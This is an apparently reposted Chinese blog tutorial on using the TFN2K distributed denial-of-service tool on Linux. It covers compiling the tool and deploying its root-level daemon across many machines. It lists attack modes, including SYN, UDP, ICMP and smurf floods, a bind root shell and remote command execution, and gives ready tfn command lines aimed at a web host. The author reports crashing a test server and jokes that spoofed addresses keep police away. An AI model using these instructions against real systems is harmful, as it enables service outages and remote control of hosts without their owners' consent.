Linux系統(tǒng)實現(xiàn)DDOS攻擊的方法

時間：2010-07-15 22:38:22 整理：佚名 []

軟件用的是有名的DDOS，首先說我們用來攻擊的客戶機和服務(wù)器的配置方法，使用當(dāng)下有名的REDHAT Linux進行測試，本次攻擊測試我使用的是FEDORA CORE3。

　　開始設(shè)置服務(wù)器：

　　解壓 tar -zxvf tfn2k.tgz

　　1.安裝TFN2K

　　TFN2K為開放原代碼的軟件，所以需要我們進行編譯，這個不用說了，編譯應(yīng)該都會的吧，但有幾個地方是必需注意的，因為使用不同版本和廠商的Linux需要不同的設(shè)置。

　　先修改src/ip.h

　　注釋掉以下部分，否則編譯出錯。

　　/*struct in_addr

　　{

　　unsigned long int s_addr;

　　}; */

　　然后make進行編譯

　　編譯時會提示你輸入服務(wù)器端進行密碼設(shè)置8-32位，(攻擊的時候需要輸入密碼)編譯后會出現(xiàn)兩個新的執(zhí)行文件td 和 tfn,其中td是守護進程，也是客戶機的使用進程。而tfn是服務(wù)器控制進程，如果想攻擊別人就必需先起動td這個進程，然后再運行服務(wù)器進程，否則攻擊無效,更改密碼可以執(zhí)行mkpass進行更改。后在所有的客戶機中安裝并運行td(需要ROOT權(quán)限)，并且在服務(wù)器上建立一個文本文件，文件中記錄所有的客戶機IP地址(用VI編輯一個就可行了)，格式為:

　　192.168.0.1

　　192.168.0.2

　　192.168.0.3

　　IP

　　IP

　　.....

　　然后在主服務(wù)器上運行./tfn

　　2.DDOS攻擊實現(xiàn)

　　./tfn直接回車大家可以看到一些參數(shù),英文好的朋友估計不用我來多講了:)

　　格式./tfn <參數(shù)>

　　無用的參數(shù)我們不提,我們來說攻擊用的

　　-f 這個參數(shù)后面跟剛才所寫的文本文件名,就是真正實現(xiàn)DDOS攻擊,而不是DOS

　　-h DOS攻擊,也就是單機,一對一的攻擊后面跟一個主機或IP地址

　　-p 后面指定一個端口,不用說了

　　-c 關(guān)鍵的參數(shù),一共有11個選相

　　0 - 停止攻擊,發(fā)善心用的

　　1 - 反欺騙等級設(shè)定 ,因為TFN這個工具在攻擊的時候所發(fā)出的數(shù)據(jù)包是帶有源地址的,但是源地址是隨機的,也就是說地址不是你自給的,所以不用擔(dān)心警察抓,哈哈

　　2 - 改編數(shù)據(jù)包的包尺寸：缺省的ICMP/8,smurf,udp攻擊缺省使用小包。你可以通過改變每個包的有效載荷的字節(jié)增加它的大小。

　　3 - 綁定root shell:啟動一個會話服務(wù)，然后你連接一個指定端口就可以得到一個root shell。

　　4 - UDP洪水攻擊：這個攻擊是利用這樣一個事實：每個udp包被送往一個關(guān)閉的端口，這樣就會有一個ICMP不可到達的信息返回，增加了攻擊的能力。

　　5 - SYN洪水攻擊：這個攻擊有規(guī)律的送虛假的連接請求。結(jié)果會是目標(biāo)端口拒絕服務(wù)，添瞞TCP連接表，通過對不存在主機的TCP/RST響應(yīng)增加攻擊潛力,是標(biāo)準(zhǔn)的拒絕服務(wù)攻擊.

　　6 - ICMP響應(yīng)(ping)攻擊：這個攻擊發(fā)送虛假地址的ping請求，目標(biāo)主機會回送相同大小的響應(yīng)包。

　　7 - SMURF攻擊：用目標(biāo)主機的地址發(fā)送ping請求以廣播擴大，這樣目標(biāo)主機將得到回復(fù)一個多倍的回復(fù)。

　　8 - MIX攻擊：按照1:1:1的關(guān)系交替的發(fā)送udp,syn,icmp包，這樣就可以對付路由器，其它包轉(zhuǎn)發(fā)設(shè)備，NIDS,sniffers等,輪番轟炸:)

　　9 - TARGA3攻擊

　　10 - 遠程命令執(zhí)行,這個參數(shù)是TFN的附加功能,其實TFN的攻擊不僅僅是DOS,還可以遠程的進行明令控制,如:

　　./tfn -f hostext -c 10 -i "mkdir /root/edison" 在所有的HOST上root家目錄建立edison,-i后面跟"命令"

　　參數(shù)基本說完,下面攻擊

　　./tfn -f hostext -c 4 -i www.xxx.com

　　使用hostext文件中記錄的主機對163服務(wù)器進行UDP攻擊(所有的主機中必需已經(jīng)起動td進程)

　　./tfn -f hostext -c 5 -i www.xxx.com -p 80

　　使用hostext文件中記錄的主機對163服務(wù)器進行TCP拒絕服務(wù)攻擊(80攻擊WEB,其他不用說了)

　　./tfn -f hostext -c 6 -i www.xxx.com

　　使用hostext文件中記錄的主機對163服務(wù)器進行ICMP攻擊(PING攻擊,緩沖區(qū)溢出馬上死機)

　　./tfn -f hostext -c 8 -i www.xxx.com

　　使用hostext文件中記錄的主機對163服務(wù)器進行ICMP&TCP&UDP輪番攻擊(如果對方是sniffer一定哭死)

　　./tfn -f hostext -c 0

　　讓所由主機停止攻擊

　　基本說完, 后說說我的測試結(jié)果

　　一對一攻擊,攻擊方式TCP 連接方式本地本地CPU13% 被攻擊的服務(wù)器CPU使用率70%以上,并時時波動

　　二對一攻擊,攻擊方式TCP 連接方式本地本地單機CPU13% 被攻擊的服務(wù)器CPU使用率

　　五對一攻擊,攻擊方式TCP 連接方式本地本地單機CPU13% 被攻擊的服務(wù)器死機.本人家里只有6臺機器,但如果再多點,幾十臺機器,一般的個人服務(wù)器肯定要死掉了

　　一對一攻擊,攻擊方式ICMP 連接方式本地本地CPU18% 被攻擊的服務(wù)器CPU使用率96%以上,并時時波動二對一攻擊,攻擊方式ICMP 連接方式本地本地單機CPU18% 被攻擊的服務(wù)器以經(jīng)無法上網(wǎng),幾乎無法使用,半小時內(nèi)死機。

來頂一下

返回首頁

百度中找“Linux系統(tǒng)實現(xiàn)DDOS攻擊的方法”的內(nèi)容

GOOGLE中找“Linux系統(tǒng)實現(xiàn)DDOS攻擊的方法”的內(nèi)容

關(guān)鍵詞：Linux系統(tǒng)實現(xiàn)DDOS攻擊的方法相關(guān)文章

相關(guān)推薦文章